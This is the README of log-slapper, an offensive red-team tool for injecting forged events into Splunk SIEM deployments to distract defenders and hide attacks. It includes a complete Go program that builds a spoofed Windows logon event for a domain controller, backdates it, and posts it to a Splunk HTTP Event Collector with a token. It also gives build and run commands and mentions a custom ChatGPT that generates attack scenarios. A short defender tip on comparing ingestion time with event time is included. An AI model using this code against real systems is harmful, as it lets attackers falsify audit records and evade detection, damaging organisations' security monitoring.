log-slapper is an open-source offensive security tool designed for red-team operations as a post-exploitation module and for assessing your Splunk's security.

log-slapper 🪵🪓👹



Every company undoubtedly trusts its SIEM, right? Think twice.
We can inject fake logs, distract blue teams and hide our attacks thanks to vulnerable SIEM solutions and configurations.

description

log-slapper is an offensive security tool designed to be used by red-teamers during the post-exploitation phase. It abuses SIEM deployments (basically any Splunk instance) and configurations that allow arbitrary logs to be injected into the target system, so the indexer records events that never happened on the hosts they are attributed to.

log-slapper can:

  • mimic attacks on behalf of any other computer on the network
  • run in interactive mode: Target Shell Playzone
  • send logs from the future and the past (time travelling!)
  • perform HEC-based attacks
  • perform built-in attacks such as spamming Windows logon success/failure and new-process-creation events
  • perform pre-determined attack scenarios defined in .yaml
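The three capabilities that matter most above (spoofed host, arbitrary timestamp, HEC delivery) all rest on one fact: Splunk's HTTP Event Collector takes `host`, `source`, `sourcetype`, `index` and `time` from the JSON envelope the client sends and the indexer stores them as-is. The Go program below is an added example written for this page; it is not log-slapper's own code. It builds one HEC event that claims to be a Windows 4624 logon on a host the sender never touched, backdated three days, and posts it to the collector. The HEC URL, token, host names and event fields are constructed placeholders.

```go
package main

import (
	"bytes"
	"crypto/tls"
	"encoding/json"
	"fmt"
	"net/http"
	"time"
)

// hecEvent is the JSON envelope accepted at /services/collector/event.
// Every metadata field here is client-supplied; the indexer does not
// verify that "host" matches the sending machine or that "time" is now.
type hecEvent struct {
	Time       float64     `json:"time"`
	Host       string      `json:"host"`
	Source     string      `json:"source,omitempty"`
	Sourcetype string      `json:"sourcetype"`
	Index      string      `json:"index,omitempty"`
	Event      interface{} `json:"event"`
}

// BuildSpoofedEvent encodes one event attributed to `host` at `ts`.
// ts may be in the past or future; HEC expects epoch seconds (fractional ok).
func BuildSpoofedEvent(host, sourcetype, index string, ts time.Time, event interface{}) ([]byte, error) {
	ev := hecEvent{
		Time:       float64(ts.Unix()) + float64(ts.Nanosecond())/1e9,
		Host:       host,
		Sourcetype: sourcetype,
		Index:      index,
		Event:      event,
	}
	return json.Marshal(ev)
}

// SendHEC posts payload to hecURL with a "Splunk <token>" Authorization header
// and returns the HTTP status code. 200 means the indexer accepted the event.
func SendHEC(hecURL, token string, payload []byte, insecureTLS bool) (int, error) {
	req, err := http.NewRequest(http.MethodPost, hecURL, bytes.NewReader(payload))
	if err != nil {
		return 0, err
	}
	req.Header.Set("Authorization", "Splunk "+token)
	req.Header.Set("Content-Type", "application/json")
	client := &http.Client{
		Timeout: 10 * time.Second,
		// Assumption: the target HEC endpoint uses a self-signed certificate.
		Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: insecureTLS}},
	}
	resp, err := client.Do(req)
	if err != nil {
		return 0, err
	}
	defer resp.Body.Close()
	return resp.StatusCode, nil
}

func main() {
	// Constructed sample: a logon on DC01 attributed to a service account,
	// stamped 72 hours in the past. None of this happened on DC01.
	past := time.Now().Add(-72 * time.Hour)
	event := map[string]interface{}{
		"EventCode":      4624,
		"ComputerName":   "DC01.corp.local",
		"TargetUserName": "svc_backup",
		"LogonType":      10,
		"IpAddress":      "10.0.5.17",
	}
	payload, err := BuildSpoofedEvent("DC01.corp.local", "WinEventLog:Security", "wineventlog", past, event)
	if err != nil {
		panic(err)
	}
	// Placeholder endpoint and token; replace with values from log.settings.
	status, err := SendHEC("https://192.0.2.10:8088/services/collector/event",
		"00000000-0000-0000-0000-000000000000", payload, true)
	if err != nil {
		panic(err)
	}
	fmt.Println("HEC status:", status)
}
```

Two practitioner notes. A HEC token can be restricted to a list of allowed indexes and given a default sourcetype, which limits the `index` field but does nothing for `host` or `time`, so a leaked token is enough to write history for any machine. On the defending side, backdated events are still visible: Splunk stores the ingestion time separately as `_indextime`, so a search that compares `_indextime` with `_time` will surface events whose claimed time is far from when the indexer actually received them.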

installation

To install log-slapper, you can directly compile the project using the go build . command. If you encounter any errors, follow the steps below to ensure all dependencies are installed:

# clone the Repository:
git clone https://github.com/oz9un/logslapper.git
cd logslapper

# install Dependencies:
sudo apt install libnetfilter-queue-dev
sudo apt install libpcap-dev

# build the project:
go build .

usage

After the first installation, you need to create a log.settings file yourself, as it is not generated automatically. This file requires the following information:

  • Indexer/HF's IP address: this is where the logs will be injected.
  • HEC token: optional, in case you have a HEC token for the target instance.

You can manually enter those details. However, if you have root access, you can start log-slapper with `sudo`, and it will automatically find the target Splunk instance's IP address:

sudo ./logslapper


After that, you can select the attack type you want from the interactive menu.

Besides the interactive menu, you can also pick the attack types listed in the help menu and run them directly from the command line:

Other attack types are explained in the help menu; if you need more details, examine the slides or contact me directly.

create your own attack scenarios to execute

log-slapper allows you to create custom attack scenarios, collected in a single YAML file and provided as input to the tool. This way you can describe practically any attack scenario you have in mind and inject it into the target Splunk instance.

creating and executing an attack scenario

You can define your attack scenarios in a YAML file, where you can specify the logs, events, and sequences you want to simulate. Once your scenario is ready, save it as attack_template.yaml (or any name you prefer).

To execute log-slapper with your pre-determined attack scenario, use the following command:

./log-slapper attack -f attack_template.yaml

For the example attack_templates, have a look at the "example-attack-templates" folder.

using the event genie

There is also a custom ChatGPT called "windows event genie", created to help you write Windows attack scenarios. Describe the attack you want to inject and it will produce a .yaml for you:

Go to the Event Genie

about the research & tool

This tool has been showcased at several security conferences, including:

  • BsidesSATX
  • BsidesTirana
  • Hacktivity
  • BsidesPrague

The latest and most powerful version of log-slapper, along with the comprehensive research behind it, was presented at DEFCON 32 Red Team Village by Özgün Kültekin. This version includes enhanced features and capabilities, making it a must-have tool for any red team operation.


Now, DEFCON32 slides are publicly available! : The SIEMless Hack: Rewriting Reality with Log Injection

changelog: diff between v2 and v1

As of its premiere at Red Team Village @ DEFCON32, log-slapper includes the following functionalities:

  • No root access required: log-slapper no longer needs root access to inject logs, making it more versatile and easier to use in various environments.
  • Direct TCP communication: logs can be injected into the target indexer/HF over a direct TCP connection. You don't even need Splunk installed on the compromised machine.
  • Custom attack scenarios: attackers can create their own attack scenarios and provide them as input to log-slapper. The tool follows these pre-determined scenarios, allowing more precise and controlled testing of SIEM solutions.
